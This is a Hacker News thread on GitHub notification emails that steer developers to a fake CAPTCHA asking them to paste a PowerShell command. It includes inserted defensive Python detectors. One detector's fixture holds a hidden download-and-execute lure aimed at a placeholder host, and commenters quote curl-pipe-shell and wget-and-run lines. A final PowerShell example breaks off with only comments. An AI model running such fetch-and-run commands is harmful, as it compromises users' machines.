[HN Gopher] GitHub notification emails used to send malware
___________________________________________________________________
GitHub notification emails used to send malware
Author : crtasm
Score : 436 points
Date : 2024-09-19 21:16 UTC (1 day ago)
(HTM) web link (ianspence.com)
(TXT) w3m dump (ianspence.com)
| qwertox wrote:
| It's worth the read, he shows what they're trying to do.
|
| Easy to be suspicious with the link alone, but it's fun to see
| someone digging into it.
| slig wrote:
| Seriously, how hard can it be for GH to detect that a randomly
| just-created account is creating issues with the same text,
| containing a link?
|
| I got dozens of such spam during a whole day.
| nine_k wrote:
| Once they introduce that, the texts will become more varied,
| and links, possibly, too.
|
| There are more possible next steps, which would make creating
| accounts for spamming more expensive, but they will also
| inconvenience well-meaning new users.
|
| I suspect that unless the problem of malicious spam from GitHub
| comments becomes rather serious, acting on a case-by-case
| basis may be the correct solution.
| klabb3 wrote:
| > Once they introduce that, the texts will become more varied
|
| I've said for some time that, while LLMs are varying levels
| of useful for a lot of people, they're practically tailor-made
| for spam and phishing. I can't think of any "product-market-fit"
| as good as that.
|
| For instance: Imagine combining a leak of personal data from
| your favorite data broker (who knew that this would come back
| and bite), with an LLM to bypass spam filters and perform
| phishing attacks with eerily believable social engineering
| behind it. All for next to no money.
| elashri wrote:
| > The attacker quickly deletes the issue
|
| I realized I have never deleted an issue I started, but aren't
| people with admin access the only ones with the ability to delete
| issues on a repo? [1] So actually there is a trace for that
| issue in the repository. Same thing for pull requests.
|
| [1] https://docs.github.com/en/issues/tracking-your-work-with-
| is...
| 8organicbits wrote:
| Maybe GitHub had already deleted it as malicious, but the email
| was already delivered.
| tonygiorgio wrote:
| I got this on two org repos yesterday. About an hour after
| the email, I checked and it was gone. I wanted to report it,
| even though GitHub scam reports are so very unsatisfying
| (weeks go by, then random email about how they took some
| action).
|
| One very simple measure I hope they implement is just not
| sending emails for unverified spam like this. I'd argue a
| majority of issues or comments do not need instant emails.
| Even one hour delay could help in combating abuse like this
| if they had any sort of reasonable moderation rules.
| latexr wrote:
| > GitHub scam reports are so very unsatisfying (weeks go
| by, then random email about how they took some action).
|
| Either you're unlucky or I'm lucky, I've reported scammers
| to GitHub multiple times and always got a response in a
| couple of hours.
| elashri wrote:
| I reported spam comment and they acted in less than an
| hour. I reported the exact spam comment by another user
| in the same day and they took 3 months to act. It is a
| very random process.
| cwizou wrote:
| Same here, I get frequent spam on one specific (very
| popular) issue, and they always take care of it within an
| hour or two. I hide the spam myself to protect the users
| on the web (I can't do anything about the phishing emails
| that get sent, though [by default I think?]), and their
| moderation wipes the spam account and sends a quick email
| to confirm.
|
| Usually it's a new user who clones a few repositories to
| pass whatever mitigation they have.
|
| Always get a "lots of reports, this may take a while"
| email first though. I don't think I ever not got that
| one.
|
| I think there's something to be said about sending - by
| default - user generated content by email automatically
| if you've replied once to a thread. Lots of bad defaults
| here imho.
| edm0nd wrote:
| Repo owners can also edit the title and text of your Issue as
| well.
| theamk wrote:
| Do people really fall for scam like that?
|
| First, I assume the author knows the email came from github, as
| the screenshot does not show this very clearly. If that's the
| case:
|
| Red flag #1: email links to a variation of real domain. If you
| don't have information on who github-scanner.com is, it is pretty
| safe to assume it's a scam , just because it sounds like a real
| website.
|
| GIANT Enormous Huge Red Flag #2: the captcha asks you to type a
| command in a shell. I have no comment on how naive one must be to
| do this.
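The lookalike-domain check theamk describes, as an added example in Python (not from the original post or the article it discusses). It audits a constructed sample notification: the allowlist of GitHub-owned domains, the sample message and its github-scanner.com link are assumptions for illustration, and the registrable-domain helper only understands two-label suffixes such as .com or .io. It also pulls the "(Issue #N)" marker out of the subject, since that part is set by GitHub rather than by the issue author.

```python
"""Flag lookalike links in a GitHub notification email.

Added example, not code from the original post. It embeds a constructed
message and treats any link whose registrable domain is not in a small
allowlist of GitHub-owned domains as suspect, with a separate class for
domains that merely contain the string "github".
"""
import email
import re
from email import policy
from urllib.parse import urlparse

# Domains GitHub legitimately links from in notifications. The list is an
# assumption for this example; the thread itself notes GitHub uses several
# non-github.com domains (githubusercontent.com, githubnext.com).
GITHUB_DOMAINS = {"github.com", "githubusercontent.com", "github.io", "githubnext.com"}

# Constructed sample message. "(Issue #1)" in the subject is added by GitHub;
# the body text and its first link are attacker-controlled.
SAMPLE_EMAIL = """\
From: attacker-account <notifications@github.com>
Subject: [example/repo] Security alert (Issue #1)
Content-Type: text/plain; charset=utf-8

Github Security Team: a vulnerability was found in your repository.
Please verify you are not a robot at https://github-scanner.com/verify?id=1
Original issue: https://github.com/example/repo/issues/1
"""

URL_RE = re.compile(r"https?://[^\s<>]+")


def registrable_domain(host: str) -> str:
    """Return the last two labels of a hostname. Multi-part public suffixes
    such as .co.uk are not handled; that is an assumed limit of the example."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_url(url: str) -> str:
    """'trusted' if the link lands on a GitHub-owned domain, 'lookalike' if
    the hostname merely contains 'github', otherwise 'external'."""
    host = urlparse(url).hostname or ""
    if registrable_domain(host) in GITHUB_DOMAINS:
        return "trusted"
    if "github" in host.lower():
        return "lookalike"
    return "external"


def audit_notification(raw: str) -> dict:
    """Parse a raw RFC 822 message and return a verdict plus per-link classes."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",)).get_content()
    links = {u: classify_url(u) for u in URL_RE.findall(body)}
    subject = str(msg["subject"] or "")
    # The "(Issue #N)" marker is GitHub's, not the issue author's.
    issue = re.search(r"\(Issue #(\d+)\)", subject)
    verdict = "suspicious" if any(c != "trusted" for c in links.values()) else "clean"
    return {
        "verdict": verdict,
        "issue": int(issue.group(1)) if issue else None,
        "links": links,
    }


if __name__ == "__main__":
    print(audit_notification(SAMPLE_EMAIL))
```

The point of the two-class split is the one the thread keeps circling: "contains github" is not the same as "is GitHub", and a check that only looks for the brand name in the hostname passes exactly the link it should catch.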
| thephyber wrote:
| It's a numbers game.
|
| Nobody is perfect. The more features of credibility, the more
| likely there will be a higher percentage of conversions. But
| not everybody has excellent vision, is free of time pressure,
| and is not tired/exhausted.
|
| There are lots of conditions that make otherwise difficult
| fraud targets more easy to trick.
|
| And if it can be done at large scale / automated, then small
| conversion rates turn into many successful frauds (compromised
| accounts).
| szundi wrote:
| Thanks for this summary. People often forget they (hopefully)
| have grandmas and themselves sometimes making mistakes as
| well for -- whoever knows what reason. Sometimes.
| generic_dev_47 wrote:
| Agree, I once fell for a scam that I think I otherwise
| wouldn't because of string of circumstances: Being tired and
| stressed, it being Christmas time and I had actually ordered
| stuff but also because I had just upgraded iOS to the first
| version that put the address bar in Safari on the bottom of
| the screen instead of the top so I forgot to check the
| domain!
|
| I've since changed the address bar back to the top...
|
| In the end I didn't lose anything but it was a good wakeup
| call for sure.
| acomjean wrote:
| I think they're hoping for coincidences and the higher the
| numbers the more likely they'll find one.
|
| I got a real letter from the IRS two days before I got the
| scam message on my answering machine. The timing was uncanny
| and I might easily have fallen for it, had I not already
| dealt with it.
|
| It's the same for the Chinese language calls, if you speak
| Chinese it really resonates.
|
| There was a scam in the 90s where you'd call a number and
| they'd give you sports betting advice. They'd do it for free
| as a promotion trying to sell their service when you won.
| They'd tell half the callers bet team A and the other half
| team B. The numbers made it work.
|
| "Splitting games 50-50 like that--known in the biz as
| "double-siding"--is the oldest trick in the handicapper's
| very thick book. That way he knows he has at least some happy
| customers coming back. "
|
| https://vault.si.com/vault/1991/11/18/1-900-ripoffs-the-
| ads-...
| ceejayoz wrote:
| Email from a different domain is unfortunately quite common.
| Citi and PayPal both do it for some emails. Pisses me off every
| time.
| szundi wrote:
| I just don't get it, how hard could it be? How expensive could
| this be? Because lots of times they just pay these damages
| to the customer, because no one knows how this very secure
| credit card data was compromised. This baffles me. Someone,
| please enlighten us, there must be a valid reason - at least
| from an angle.
| sofixa wrote:
| Having a bunch of different domains can serve multiple
| purposes.
|
| In GitHub's case, they already have githubusercontent.com
| to avoid serving untrusted stuff from their own github.com
| domain.
|
| Sending marketing or security scanner (potentially very
| spammy) notification emails from separate domains can help
| with reputation too, to avoid your main domain getting
| marked as spam.
|
| These are all legit; Amex having 20 different domains,
| half of which smell like phishing, and still sending emails
| from other domains is just incompetence. Something like
| marketing people or someone dealing with strategy deciding
| to do stuff in a certain way, with nobody technical in the
| room to tell them why that would be a problem. As an
| example, a friend of mine's organisation wanted to do a
| SaaS website for their niche, and a separate website to
| advertise the SaaS (separate domain, visual identity,
| everything).
| progval wrote:
| My theory for most of these cases: they would need
| permission from who knows what department(s) to set up a
| subdomain of the main domain for their project, and it's
| easier to just purchase a new domain for the
| team/project.
| m3047 wrote:
| Keep your SPF simple. Otherwise, make sure it works. Aaand,
| how many people actively monitor their DNS infrastructure?
| mewpmewp2 wrote:
| I can understand clicking on the link while not paying
| attention, but I do wonder how many people who are signed up on
| GitHub would follow through with pasting this command. I could
| understand if elderly non technical people might follow up with
| it, but this one, I wonder what the rate is.
| hmottestad wrote:
| Just clicking on the link might be enough. Maybe you have a
| slightly outdated browser with a known vulnerability. Maybe
| you're holding off on installing an update just to be sure it
| won't break anything.
|
| And even if everything is up to date Pwn2Own regularly shows
| that having a user browse to a website is enough to get root
| access. Thankfully most people don't have to worry about this
| since they are unlikely to attract the attention of someone
| with that level of resources.
| hmottestad wrote:
| If I had those kinds of resources I might even put a
| captcha on the site that asks the user to do something
| incredibly stupid just to make them think they were in the
| clear.
| mewpmewp2 wrote:
| Yeah, I think the barrier to get people to just click on a
| link (outside of e-mail as well) is very low, so that would
| be easy to affect anyone.
| mixtureoftakes wrote:
| Honestly i would have typed commands in shell if "captcha"
| asked me for it. Just to see the scale of outcome's awfulness.
|
| I'm almost bored enough to just start installing weird malware
| for research and funsies
| fijiaarone wrote:
| Everyone has been trained for years to do this:
|
| curl http://obscure.url?random-string | sh
| fijiaarone wrote:
| or even this:
|
| git clone http://github.com/unknown/repo.git && cd repo &&
| npm install
| darkwater wrote:
| Even worse:
|
| $ svn checkout
|
| $ ./configure
|
| $ make
|
| # make install
| dullcrisp wrote:
| If there were a legitimate looking GitHub how-to page that
| asked me to do that, I can see myself doing it. Fortunately,
| I ignore all security issues on my repositories.
| ToValueFunfetti wrote:
| Security by lack thereof
| kurisufag wrote:
| people make a lot of noise about piping into shell, but even
| if the instructions were
|
| wget random.club/rc-12-release.sh
|
| chmod +x ./rc-12-release.sh
|
| ./rc-12-release.sh
|
| almost nobody would actually read the script before running
| it
| dullcrisp wrote:
| Well yeah, if your intention is to install software from
| random.club on your system, what would be the point of
| checking the installer script? The worst thing it can do is
| the same thing you want it to do.
| umanwizard wrote:
| Yes, which is why complaining about curl | sh is silly.
| dullcrisp wrote:
| I'm not disagreeing.
| umanwizard wrote:
| No they haven't, they've been trained to do
| curl https://url-of-well-known-project | sh
|
| I may not trust the owners of a random domain, but I
| certainly trust the owners of rustup.rs not to do anything
| intentionally malicious.
| guappa wrote:
| Microsoft owns more domain names than the amount of neurons
| in the brain.
| account42 wrote:
| Then you are more trusting of the Serbian National Internet
| Domain Registry than you should be.
| micw wrote:
| Another red flag. I cannot take any project serious that has
| this on its documentation.
| kadoban wrote:
| You prefer that they wrap it in an .msi file and put it on
| that same website? What do you think the advantages of that
| are?
| d0mine wrote:
| what is the more secure way in you opinion? What is the
| weak link here? TLS transport? possibly compromised
| hosting/codebase? trust in app authors? not reading the
| shell script? checking a signature of some file?
| micw wrote:
| My issue is the bypassing of the system's package manager.
| Doing so will result in files spread somewhere over the
| system. How do you uninstall such a thing properly? How do
| you update (or even know) its dependencies? Will it
| break because I uninstall or update one of its
| dependencies?
|
| Linux has had very good package management for many years.
| I see absolutely no reason to break this by creating shell
| installers.
| umanwizard wrote:
| I guess you don't think the Rust programming language is a
| serious project, then?
| guappa wrote:
| I mean they even named the website cargo, after cargo
| culting! (jk)
| lgats wrote:
| re #1: the email could link to a github pages site hosting the
| same malware...
|
| re #2: it doesn't really have you typing into shell, 'just
| paste'
| latexr wrote:
| A few weeks ago someone opened an issue in one of my repos. _In
| under a minute_ two accounts replied with links to file lockers
| asking the user to download and try some software to solve
| their issue. No doubt it was malware. I promptly deleted the
| comments and reported the accounts to GitHub.
|
| I wouldn't have fallen for such an obvious ploy, but the
| original asker seemed like they weren't particularly technical,
| judging by the sparse GitHub history and quality of the
| question. I could see them perhaps falling for that if they
| were uncritical and too eager to try anything.
| zahlman wrote:
| Not only does it ask you to copy and paste a command in shell,
| but Windows apparently warns you that it will run with admin
| privileges.
|
| Aside from that:
|
| > Nowhere in the email does it say that this is a new issue
| that has been created, which gives the attacker all the power
| to establish whatever context they want for this message.
|
| What about the non-user-controlled "(Issue #1)" in the subject
| line?
| eviks wrote:
| > Red flag #1: email links to a variation of real domain
|
| It's too common, MS also does this, to be a red flag
| sureglymop wrote:
| Just to let you know, even github themselves use multiple
| domains instead of just subdomains of github.com (see
| githubnext.com).
|
| So, I wouldn't blame the victims here if the service itself
| does not realize why that is not such a good idea.
| 8n4vidtmkvmk wrote:
| Yeah.. I don't like when companies do that. I usually Google
| the domain first to see if it's legit, but even that isn't
| foolproof.
| thih9 wrote:
| If this was within my first year of owning a GitHub account, I
| would absolutely fall for this.
|
| It's not much different from setting up your ssh key -
| something that you have to do; and new users also go through
| this workflow by copy pasting commands that GitHub sends them.
| jampekka wrote:
| A prime example of how all the paranoid security hoops can
| easily make things more insecure in aggregate.
|
| Since Microsoft embraced and extended it, GitHub has become
| one of the worst offenders.
| obscurette wrote:
| I'm old enough to remember ILOVEYOU. During years after that I
| have seen millions and millions thrown into educating users not
| to click on wrong things.
|
| Last month I was at a conference where the keynote was from the
| CEO of a cyber security company. The whole point of the speech
| was that we need more money because in some cases more than 80%
| of users still fall for email scams. My very serious question to
| the speaker was - if after many millions and almost 25 years
| more than 80% users still click on wrong links, then maybe we
| do something really wrong?
| bugtodiffer wrote:
| We are, but people want convenience.
|
| Try to get a company built around Word to use another tech
| that doesn't require running unsigned macros from emails...
|
| You literally can't, they laugh at you for saying things like
| "don't use Microsoft"
| mnau wrote:
| We are not doing anything wrong, but we are completely
| neglecting the attacker side.
|
| All our actions are defensive.
|
| Look at our physical security. Basically nothing is
| reasonably protected. 99% of stuff (buildings, locks) can be
| broken into with tools available in any home depot.
|
| The key reason why it doesn't happen that much is because
| it's possible to find the attacker.
|
| Why can any scammer just create a website without any
| traceability? It wouldn't be foolproof, but it would raise the
| bar.
| chii wrote:
| > Why can any scammed just create a website without any
| traceability?
|
| because jurisdictional challenges.
|
| Not to mention that this very same traceability would be
| abused by some other authoritarian gov't to track down
| dissidents for example.
|
| There's no real way to systematically have good security,
| if the human element is the weakest link tbh. Securing
| windows is not a technical problem, but a social and
| educational one.
| mnau wrote:
| More like no will.
|
| Does the domain/server implement the required level? No?
| Block connection. Ditto email with automatic response.
|
| Is your IP in a botnet? Cut it off.
|
| Edit: I already get blocked connection (on target site)
| because EU regulation is too onerous. I get reminded on
| basically every Google search I am being censored (Some
| results may have been removed under data protection law
| in Europe).
|
| Completely doable.
| GTP wrote:
| > I already get blocked connection (on target site)
| because EU regulation is too onerous
|
| More like "we want to track every single user coming to
| our website without giving them the option to not be
| tracked".
| mnau wrote:
| You can serve consent form only to the connections from
| EU.
|
| I have been part of several GDPR compliance projects
| and it's the other stuff that's the problem.
|
| Data protection officer (recurring cost, even though it
| is only a part of a job, not full time position) , user
| data deletion and user data take-out. Compliance is not
| free. If system wasn't designed from the beginning, it's
| really expensive to add it.
|
| Restore from backup after disaster recovery - make sure
| you anonymize/delete people who were deleted after backup
| was made.
|
| BTW, IP address is PII, so...
|
| Honestly, it would be cheaper to buy everyone in EU VPN.
| janc_ wrote:
| It's actually very simple & cheap to be compliant: stop
| tracking EU citizens.
| GTP wrote:
| > You can serve consent form only to the connections from
| EU.
|
| Why? While I get that, if tracking is part of someone's
| business model, they want to track as many people as
| possible, I doubt it would be illegal to give also people
| that aren't in the EU the option to not be tracked. If it
| really would be so expensive to be compliant while also
| differentiating between users connecting from the EU and
| users connecting from outside the EU, why not just give
| everyone the option to choose if they want tracking as a
| measure to cut compliance cost?
| guappa wrote:
| What do you suggest? Bomb even more countries?
| mnau wrote:
| You don't need to bomb anyone.
|
| Add IP rules at cables inside and out of let's say EU and
| block it there.
|
| Same way we deal with any non-compliance thing. You can't
| import it.
|
| Your server/domain doesn't satisfy requirements. Either
| the originator complies or not (e.g. through trusted
| third party).
| guappa wrote:
| Because ip geolocation has always been reliable and never
| inaccurate?
| mnau wrote:
| No geolocation is needed. And even if it was, these are
| technical problems, inherently solvable.
|
| So far, we are building walls and replacing mortar with a
| new one, while attackers bombard us with complete
| impunity. This is never going to work.
|
| This would of course need new extensions /protocols (even
| simplest would require authentication envelope around
| encrypted traffic).
| guappa wrote:
| The problem is that you think a societal problem can be
| solved technically.
| mnau wrote:
| The whole point is to move from technical solution (i.e.
| current approach) to legal one.
|
| Not a single response had anything to do with either
| problem ITA or my comment.
|
| I am not sure if you are troll, 10 y/o or gpt1, but have
| a nice day.
| unethical_ban wrote:
| Do you think people should have to get permission to host a
| server on the internet?
| guappa wrote:
| They measure by clicks... but clicking a link doesn't mean
| you'll follow through and put in your username, password, and
| 2fa code.
|
| Ultimately he's a businessman seeking more money. Doesn't
| mean he can be trusted.
| kayodelycaon wrote:
| In my opinion, these products are nothing but scams. I
| can't use any links from work emails on my phone because I
| can't see the domain of a link without previewing the page.
| IT told me I needed to change system-wide settings to
| disable previewing webpages in every app on my phone. Not
| happening.
|
| Fortunately, my work email supports IMAP, so I can use a
| script to scan my inbox for fake phishing emails and delete
| them.
| edelbitter wrote:
| They do. Just after seeing instructions to run this, and
| complying:
|
| > curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs |
| sh
|
| (Yup, .rs is the ccTLD for the Republic of Serbia, of former
| SFR Yugoslavia)
| chii wrote:
| > the captcha asks you to type a command in a shell. I have no
| comment on how naive one must be to do this.
|
| someone who knows computers (like a programmer) might not fall
| for it, but people who do not know computers, but is dabbling
| could easily fall for it.
|
| The copied command specifically puts in a "user friendly
| captcha message" into the end, to overflow the run dialog
| textbox, so that a user who obeyed the instructions will see
| something vaguely resembling valid captcha verification:
| # " ''I am not a robot - reCAPTCHA Verification ID: 93752"
|
| Phishing and scams are not about catching out pros, but
| catching out "normies".
|
| It's quite scary that the scammers have put thought and effort
| into the method of infiltration, because this is "novel" as far
| as i have heard.
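Detection logic for the pattern chii describes, as an added example in Python (not from the original post or the article). It assumes process command-line telemetry is available as text and that the pasted payload is a PowerShell one-liner ending in a `#` comment that carries the fake CAPTCHA text, which is what overflows the Run dialog so the user only sees the reassuring tail. The sample command lines are constructed, the download-cradle names and the lure word list are assumptions, and the comment splitter tracks quotes but ignores escaped quotes.

```python
"""Spot 'paste this into Win+R' lures in process command-line telemetry.

Added example, not code from the original post. The idea: PowerShell
ignores everything after an unquoted '#', so the attacker can append a
long comment ("I am not a robot - reCAPTCHA Verification ...") that the
narrow Run box shows instead of the command in front of it. Splitting the
line at that comment and scoring both halves separately makes the trick
visible to a detection rule.
"""
import re

# Constructed sample command lines. The "captcha" tail mirrors the form
# quoted in the thread; the command in front of it is a placeholder.
SAMPLE_COMMAND_LINES = [
    # the lure: hidden PowerShell, download cradle, long trailing comment
    'powershell.exe -w hidden -c "iex (irm https://example.invalid/x)" '
    '# " \'\'I am not a robot - reCAPTCHA Verification ID: 93752"',
    # benign: an admin running a script from a file, no comment at all
    'powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1',
    # benign: a '#' inside quotes is not a comment and must not be split on
    'powershell.exe -c "Get-Date # checked"',
]

# Words a legitimate command line has no reason to contain, but the lure
# needs so the victim reads something reassuring in the Run box.
LURE_WORDS = re.compile(
    r"not a robot|captcha|verification id|verify you are human", re.I
)
# Download-and-execute cradles commonly seen in such one-liners (assumed list).
CRADLE = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
    r"|downloadstring)\b",
    re.I,
)
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)


def split_trailing_comment(cmdline: str):
    """Split at the first '#' that is outside single or double quotes.

    Returns (executed_part, comment_part); comment_part is '' when there
    is no comment. Escaped quotes are not handled (assumed simplification).
    """
    quote = None
    for i, ch in enumerate(cmdline):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "#":
            return cmdline[:i].rstrip(), cmdline[i + 1:].strip()
    return cmdline, ""


def score_command_line(cmdline: str) -> dict:
    """Return the evidence gathered for one command line and a verdict."""
    executed, comment = split_trailing_comment(cmdline)
    evidence = {
        "powershell": bool(POWERSHELL.search(executed)),
        "cradle": bool(CRADLE.search(executed)),
        "lure_in_comment": bool(LURE_WORDS.search(comment)),
        # a comment that rivals the executed part in length is the overflow trick
        "comment_dominates": len(comment) > 40 and len(comment) >= len(executed) // 2,
    }
    is_lure = evidence["powershell"] and evidence["lure_in_comment"] and (
        evidence["cradle"] or evidence["comment_dominates"]
    )
    return {"verdict": "lure" if is_lure else "benign",
            "executed": executed, "comment": comment, **evidence}


def scan(lines) -> list:
    """Score every telemetry line and return only the ones that look like the lure."""
    results = [score_command_line(line) for line in lines]
    return [r for r in results if r["verdict"] == "lure"]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(hit["verdict"], "|", hit["executed"], "|", hit["comment"])
```

Requiring the lure text to sit in the comment half, rather than anywhere on the line, is what keeps the rule from firing on an admin who legitimately mentions "captcha" in a script argument; the third sample shows why the quote tracking matters.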
| Stratoscope wrote:
| Red flag #3: "Github Security Team"
|
| A legitimate GitHub email would never mis-capitalize the
| company name like that. It would be GitHub, as shown in the
| footer that the attacker does not control.
|
| OTOH, this is a very common mistake. The article alternates
| between the correct GitHub and the incorrect Github. So it
| would be easy to not notice that error.
| antimemetics wrote:
| You assume the scammers want everyone to fall for this trick.
|
| The reality is different - they leave these huge red flags so
| that people who aren't very bright or careful will fall for it.
|
| That is the same reason why scammers put spelling mistakes in
| emails - not because they don't know how to use spellcheck, but
| because they want to filter out those who would spot these
| mistakes.
|
| They want to scam careless, gullible, "stupid" people, not
| someone who is careful enough to spot security red flags.
| godelski wrote:
| > Do people really fall for scam like that?
|
| I routinely get people opening issues on my projects asking
| where the source code is or how to fine tune their models on
| different data or even how to install pytorch.... There's a lot
| of people on GitHub that don't know the first thing about
| coding. There's a lot of people on GitHub that don't know how
| to use Google... This even includes people with PhDs...
| NeveHanter wrote:
| I've also seen an issue on GitHub asking project author to
| add an entry in README.md with instructions on how to clone
| the repository...
| tom_ wrote:
| Actually worth doing if the repo uses submodules.
| godelski wrote:
| https://lmgtfy.click/?q=How%20do%20I%20clone%20a%20reposi
| tor...
| keybored wrote:
| The naive way in this case wouldn't be to make an issue:
| How do I clone this repo? I see it has submodules
|
| The naive way would be to just clone the repo without any
| (apparently) options.
|
| I can attest to this because that's probably what I would
| do.
|
| The readme would not resolve a problem that someone
| knowingly had. It would resolve an unknown upcoming
| problem.
| prmoustache wrote:
| > GIANT Enormous Huge Red Flag #2: the captcha asks you to type a
| command in a shell. I have no comment on how naive one must be to
| do this.
|
| I guess critical thinking of devs and wannabee devs has been
| softened by all the `curl <script> | bash` installation
| instructions.
| d3nj4l wrote:
| Yeah exactly, I do that all the time when filling captcha!
| Dibby053 wrote:
| > GIANT Enormous Huge Red Flag #2: the captcha asks you to type a
| command in a shell. I have no comment on how naive one must be to
| do this.
|
| Funnily enough there's at least one legit captcha that has you
| do this: if you have JavaScript/WASM disabled it gives you the
| option of running the anti-DDOS proof-of-work in a shell and
| pasting the result in a textbox.
| maicro wrote:
| All valid points, but I will say services don't help in this
| situation - I received an email from @redditmail.com recently,
| which is real and part of reddit but feels off on first glance.
|
| Couple that with gmail having no way to show the full email
| address (by default - I know you can hover, etc.), rather than
| the sender-provided "sender name", and my false-positive rate
| for at least double checking and confirming the sending domain
| is kinda high...better that than a bunch of false-negatives of
| course.
| voytec wrote:
| > Do people really fall for scam like that?
|
| Yes. It wouldn't be a thing otherwise. I know at least two
| fairly intelligent people, one literally being a Mensa member,
| who fell for sextortion emails and got their files encrypted.
|
| Scareware is based on social engineering, and is crafted to
| trigger emotional response, not educated one.
| me-vs-cat wrote:
| > Do people really fall for scam like that?
|
| You should put a "voice activated" sticker on a random break
| room appliance (toaster, water/ice dispenser, microwave, coffee
| machine, ...).
|
| Don't use strong adhesive if your desk is within hearing
| distance.
| kyledrake wrote:
| I received one of these notifications this morning and promptly
| ignored it. I had to laugh because it was about this repo
| specifically: https://github.com/kyledrake/theftcoinjs
| drexlspivey wrote:
| If your method of infecting your victim is having them paste and
| run a random command on their terminal, software developers are
| probably the worst group of people to be targeting.
| arccy wrote:
| you'd be surprised at the quality of the average dev
| thephyber wrote:
| "Curl pipe sh" would like to have a word...
|
| I think you are painting with a broad brush.
| vultour wrote:
| This is no different from installing a random package through
| a package manager. If you're running "curl pipe sh" because
| an email told you to, that's on you.
| craftkiller wrote:
| No it isn't. Package managers verify the cryptographically
| signed package. That means the package can be built on a
| secure server, and then if a mirror becomes malicious or
| gets compromised, the malicious package won't have a valid
| signature so the package will not be installed. Running
| curl and piping it into sh means that not only could a
| malicious mirror or compromised server execute anything
| they want on your computer, but they could even send a
| different script when you curl it into sh vs when you view
| it any other way, making it much harder to detect[0].
|
| [0] https://web.archive.org/web/20240213030202/https://www.
| idont...
| dylan604 wrote:
| I think the npm repos would like to have a word with you.
| Sure glad we've never had a cryptographically signed
| malicious package delivered via npm install
| craftkiller wrote:
| Thats like not wearing a seatbelt because you can still
| be crushed by a truck. Don't let perfect be the enemy of
| good. Package managers prevent some attacks that are
| possible via curl | sh. Some other attacks are still
| possible. It is still better than not cryptographically
| verifying the package.
| dylan604 wrote:
| That's like moving the goal posts so you can still try to
| have a point after the fact. Your comment suggested that
| package manager was secure while curl | sh isn't because
| the package manager won't have a valid signature. That's
| only if the package manager was compromised. A code
| package that is built to be malicious will still get
| signed by your manager. Only now, people think they are
| secure because it was signed.
| bugtodiffer wrote:
| Couldn't I just publish a package? Then there's malware
| on the package manager wohooo
| _hyn3 wrote:
| The tremendous number of attacks delivered via trusted
| package repos versus the number of _widespread_ attacks
| via curl | sh (probably roughly zero) means that,
| theories aside, one of these is far more commonly abused
| than the other.
| thephyber wrote:
| Both are examples of developer-types doing risky things,
| which was my point and also supports my point that
| developers are not exclusively better secured than non-
| developer types.
| lukan wrote:
| My only encounter with this is that I am annoyed if I open web
| dev tools on a new browser profile/guest profile, but am
| interrupted in my workflow because first I have to type "allow
| pasting" every single time. (Why do I do this quite often? To be
| sure to have a clean state when debugging a web app.) And all
| this because some people cannot think before they follow
| obscure instructions sent to them by an untrusted party?
|
| Why can't we have nice things again? Because of abusers yes,
| but also because of sheep people.
| TheRealPomax wrote:
| You just need a handful of people to fall for it, and a
| population of a hundred million daily active users on GitHub
| means there are _always_ a handful of people to trick.
| jeroenhd wrote:
| Hard disagree. Developers aren't magically tech wizards, many
| of them will struggle to install a printer. I've seen one spend
| fifteen minutes on adding a keyboard layout in Windows last
| week (granted, the process was very unintuitive).
|
| It's this "I'm a developer, I'm too smart to fall for phishing"
| mindset that makes developers an excellent target for malware.
| cebu_blue wrote:
| I don't understand what's special about this particular attack!>:(
| When I read the title I thought some automated GitHub emails were
| forged to sneakily point to a fake GitHub site or something. An
| obvious (for tech-savvy users) link pointing to an obvious
| malware (please copy and execute this code to solve the captcha.)
| If the people you are targeting fall for this why not send an old
| fashioned spam email with fake headers or via some hacked
| Wordpress installation? I guess using GitHub notifications is
| creative but in the end not much different than like sending a
| facebook message with a fake link, and the user getting an email
| notification with the message? The analysis of the malware once
| downloaded was certainly interesting, though!:)
| fijiaarone wrote:
| This is neither hijacking notifications nor sending malware. This
| is someone including a link in a message on a ticketing system
| open to the public, and then someone clicking on the link and
| downloading malware.
| crvdgc wrote:
| Months ago I got crypto ads through a similar approach, some fake
| new account @-ing hundreds of users in an issue and then the
| issue is removed. The net effect is that the ads become
| unblockable in your email box (It's from GitHub!).
|
| Maybe devs' target value in general has grown to a point where
| the openness of the system is more of a vulnerability than a
| service.
| keyle wrote:
| Press Win+R, CTRL+V <enter>
|
| From captcha to gotcha.
|
| I could see junior developers falling for this. Hey it's Github,
| it's legit right? We get security notifications every second
| month about some lib everyone uses etc. "Oh
| look, captcha by running code, how neat!"
|
| I don't think webpages should be able to fill your copy/paste
| buffer from a click without a content preview. They made it
| require a user action, such as clicking, thinking that would
| solve the problem but it's still too weak. That's problem number
| 1.
|
| People need to stop actioning any links from emails and/or
| believing that any content in an email has legitimacy. It
| doesn't. That's problem number 2.
|
| Problem number 3, Windows still lets you root a machine by 1 line
| in powershell? What the @$$%&%&#$?
|
| Github might need to stop people putting links in issues without
| being checked by automated services that can validate the content
| as remotely legitimate. They're sending this stuff to people's
| email, don't tell me they're not aware this could be used for
| phishing! That's cyber security 101, in 2015.
|
| Finally, Github, in being unable to act on the above, may need to
| better strip what they email to people, and essentially behave
| more like banks "you have a new issue in this repository..." and
| that's that. You then go there, there is no message, ok great.
| That would have taken care of this issue...
|
| It seems Github needs to graduate a bit here.
| ocdtrekkie wrote:
| I've started disabling the Run dialog for non-technical users,
| but unfortunately a GitHub attack targets users who likely have
| a real use for it sometimes.
|
| The clipboard strategy feels like it should be easy to block
| too, most scammers just convince people to type a well-obscured
| URL into the Run dialog manually over the phone.
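The Run-dialog restriction mentioned above, as an added example that is not the commenter's own script: it sets the Explorer policy value NoRun for the current user and checks it; the assumption (noted in the comments) is that a sign-out or an Explorer restart is needed before the change takes effect.

```powershell
# Added example: disable or re-enable the Win+R "Run" dialog for the current
# user through the Explorer policy value NoRun. Applying it for every user
# would use the same subpath under HKLM: instead. Assumption: the change is
# only visible after Explorer restarts or the user signs in again.
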